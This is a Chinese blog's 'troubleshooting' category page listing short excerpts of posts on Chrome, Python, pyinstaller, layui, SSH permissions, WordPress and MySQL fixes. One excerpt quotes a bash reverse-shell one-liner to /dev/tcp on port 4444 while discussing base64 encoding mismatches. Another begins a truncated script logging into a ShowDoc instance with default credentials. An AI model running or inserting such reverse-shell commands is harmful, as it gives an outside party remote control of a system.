随笔分类 -  故障解决

摘要:终端下执行: defaults write com.google.Chrome SuppressUnsupportedOSWarning -bool true 阅读全文
posted @ 2023-12-24 18:09 总得前行 阅读(1381) 评论(0) 推荐(0) 编辑
摘要:Exception in callback _ProactorBasePipeTransport._call_connection_lost(None) handle: <Handle _ProactorBasePipeTransport._call_connection_lost(None)> T 阅读全文
posted @ 2023-02-09 21:08 总得前行 阅读(1646) 评论(0) 推荐(0) 编辑
摘要:find ./ * | xargs -I {} sed -i "s/10-13/09-27/g" {} 阅读全文
posted @ 2022-11-08 13:28 总得前行 阅读(38) 评论(0) 推荐(0) 编辑
摘要:开机状态,用数据线连接电脑,可以打开i4助手方便后面查看是否进入dfu模式。 按住关机键2秒,然后同时按住关机键和Home键8-10秒;最后,只要按住Home键15秒。 看到黑屏状态后 基本就是进入了,此时查看i4助手即可 阅读全文
posted @ 2022-10-09 17:02 总得前行 阅读(4658) 评论(0) 推荐(0) 编辑
摘要:需要在windows下 pip install pyinstaller==3.2.1 #(win7 python2.7) pyinstaller -Fw 1.py # 如果要打包icon pyinstaller -Fw -i xx.ico 1.py https://blog.csdn.net/m0_ 阅读全文
posted @ 2022-09-26 17:10 总得前行 阅读(37) 评论(0) 推荐(0) 编辑
摘要:layui表格不渲染的问题 我的情况是django返回json数据给前台模板渲染,然后遇到了模板不渲染的问题。 点1 ,django返回数据时使用json.dumps(t)}装载 点2, 关闭f12,实测开启f12时候页面不渲染,关闭f12时候即可渲染 阅读全文
posted @ 2022-09-01 09:44 总得前行 阅读(91) 评论(0) 推荐(0) 编辑
摘要:<plugin> <groupId>org.springframework.boot</groupId> <artifactId>spring-boot-maven-plugin</artifactId> <version>2.2.6.RELEASE</version> <executions> < 阅读全文
posted @ 2022-04-01 16:17 总得前行 阅读(79) 评论(0) 推荐(0) 编辑
摘要:bash -i >& /dev/tcp/192.168.0.104/4444 0>&1这种带尖括号的在第三方网站进行base64编码的结果与linux终端里base64编码不一致。从而导致执行失败。 正确做法是以linux终端的为准 站长之家的编码: linux终端编码: 阅读全文
posted @ 2022-03-05 13:43 总得前行 阅读(270) 评论(0) 推荐(0) 编辑
摘要:参考来源:https://www.cnblogs.com/LiuDanK/articles/15638323.html 阅读全文
posted @ 2022-01-08 17:58 总得前行 阅读(17336) 评论(2) 推荐(0) 编辑
摘要:from pprint import pprint import requests host = 'http://127.0.0.1' user = { 'username': 'showdoc', 'password':'123456' } s = requests.Session() # => 阅读全文
posted @ 2021-11-10 21:48 总得前行 阅读(116) 评论(0) 推荐(0) 编辑
摘要:csdn里参考的很多在rc.d和rc.local文件里添加命令的形式不成功,最后在stackoverflow里找到了答案,就是在docker-compose.yml文件里添加restart标签,其中v2和v3的restart参数不一样 具体看连接 https://stackoverflow.com/ 阅读全文
posted @ 2021-10-13 22:36 总得前行 阅读(946) 评论(0) 推荐(0) 编辑
摘要:python csv模块使用时遇到'gbk' codec can't decode byte 0xaa in position 6713: illegal multibyte sequence 或者 UnicodeDecodeError: 'utf-8' codec can't decode byt 阅读全文
posted @ 2021-09-26 21:53 总得前行 阅读(192) 评论(0) 推荐(0) 编辑
摘要:https://blog.csdn.net/hehigoxqc606/article/details/110391664?utm_medium=distribute.pc_relevant_t0.none-task-blog-2%7Edefault%7EBlogCommendFromMachineL 阅读全文
posted @ 2021-06-14 17:24 总得前行 阅读(584) 评论(0) 推荐(0) 编辑
摘要:api-ms-win-crt-string-l1-1-0.dll丢失解决办法: 下载下面的更新包即可 https://support.microsoft.com/en-us/topic/update-for-universal-c-runtime-in-windows-322bf30f-4735-b 阅读全文
posted @ 2021-06-08 21:17 总得前行 阅读(8740) 评论(0) 推荐(0) 编辑
摘要:😒et tabstop=4 😒et softtabstop=4 😒et shiftwidth=4 😒et expandtab 😒et number 阅读全文
posted @ 2021-05-28 18:03 总得前行 阅读(38) 评论(0) 推荐(0) 编辑
摘要:使用当前哦用户执行chmod u+xr,go-rwx ~/.ssh即可 一般来说: 对.ssh目录设置700权限 对id_rsa,authorized_keys文件设置600权限 对id_rsa.pub,known_hosts文件设置644权限 所以,大家要注意权限的设置,权限设置不对的话ssh登陆 阅读全文
posted @ 2021-05-26 15:00 总得前行 阅读(2166) 评论(0) 推荐(0) 编辑
摘要:执行如下命令即可解锁 cd /etc/ssh chattr -V -ia sshd_config 阅读全文
posted @ 2021-05-18 17:31 总得前行 阅读(944) 评论(0) 推荐(0) 编辑
摘要:Fatal error: Uncaught Error: Call to undefined function load_textdomain() 错误百度 goole bing都没找到解决方案,最后发现是: 安装时候第二步输入数据库信息后,wordpress提示让复制代码到wp-config.ph 阅读全文
posted @ 2021-05-18 14:03 总得前行 阅读(672) 评论(1) 推荐(0) 编辑
摘要:macos中单纯安装mysql_client总是报错,百度几个方法都不行; 后面在mysql官网找到mysql shell 安装包,百度看这个mysql shell是替代mysql client的新工具,直接下载这个使用了; 下载地址: https://dev.mysql.com/downloads 阅读全文
posted @ 2021-05-15 22:24 总得前行 阅读(313) 评论(0) 推荐(0) 编辑
摘要:创建文件,写入内容 vi ~/.ssh/config #Added lines to fix. Host * IPQoS lowdelay throughput 赋权 chmod 644 ~/.ssh/config 最好在sshd文件中加入 ClientAliveInterval 30 Client 阅读全文
posted @ 2021-04-18 15:05 总得前行 阅读(142) 评论(0) 推荐(0) 编辑

点击右上角即可分享
微信分享提示